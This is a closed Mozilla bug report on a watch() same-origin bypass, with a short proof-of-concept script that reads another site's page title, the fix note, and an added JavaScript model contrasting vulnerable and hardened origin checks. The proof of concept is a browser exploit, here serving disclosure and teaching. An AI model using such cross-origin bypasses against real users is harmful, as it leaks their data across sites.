Closed
Bug 25864
Opened 25 years ago
Closed 25 years ago
watch() vulnerability
Categories
(Core :: Security, defect, P3)
Tracking
VERIFIED
FIXED
M14
People
(Reporter: joro, Assigned: norrisboyd)
Details
(Whiteboard: [PDT+])
The watch() method allows circumventing Same Origin security policy.
The code is:
-----------------------------------------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com","victim");
function f()
{
a.document.watch("title",function (id,oldval,newval) {alert('The page title is: '+oldval);})
}
setTimeout("f();a.document.title='title';",10000);
</SCRIPT>
-----------------------------------------------------------------------
Group: netscapeconfidential?
Comment 1•25 years ago
Fixed; added a new callback from the generated DOM code.
Group: netscapeconfidential?
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
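The class of bug reported here, as an added example that is not part of the original bug or Mozilla's code: a simplified model in which property reads are origin-checked but watchpoint registration is not, next to the hardened form that checks on registration. `ModelDocument`, `observeTitleViaWatch` and the origin strings are hypothetical, and the model assumes the cross-origin assignment itself is not blocked, since the reported script relies on it to fire the handler.

```javascript
// Constructed model, not Mozilla code: a document owned by one origin and
// scripted by callers that identify themselves with an origin string.
class ModelDocument {
  constructor(origin, title, checkWatch) {
    this.origin = origin;
    this.props = { title };
    this.watchers = {};
    this.checkWatch = checkWatch; // false: pre-fix behaviour, true: hardened
  }
  assertSameOrigin(callerOrigin) {
    if (callerOrigin !== this.origin) {
      throw new Error(`access denied: ${callerOrigin} -> ${this.origin}`);
    }
  }
  // Read path: always origin-checked.
  get(callerOrigin, name) {
    this.assertSameOrigin(callerOrigin);
    return this.props[name];
  }
  // Write path: assumed open to other origins (see lead-in), so no check here.
  // As with watch(), the handler sees the old value and returns the new one.
  set(callerOrigin, name, value) {
    const handler = this.watchers[name];
    this.props[name] = handler ? handler(name, this.props[name], value) : value;
  }
  // Watchpoint registration: the access path the read check did not cover.
  watch(callerOrigin, name, handler) {
    if (this.checkWatch) this.assertSameOrigin(callerOrigin);
    this.watchers[name] = handler;
  }
}

// Returns what a caller learns about `title` via watch() followed by a write.
function observeTitleViaWatch(doc, callerOrigin) {
  let seen = null;
  try {
    doc.watch(callerOrigin, "title", (id, oldval, newval) => {
      seen = oldval;
      return newval;
    });
    doc.set(callerOrigin, "title", "title");
  } catch (e) {
    return { seen: null, error: e.message };
  }
  return { seen, error: null };
}
```

The general point for review is that every scripted access path to a cross-origin object (read, write, enumeration, watchpoints) needs the same origin check, not only the direct getter.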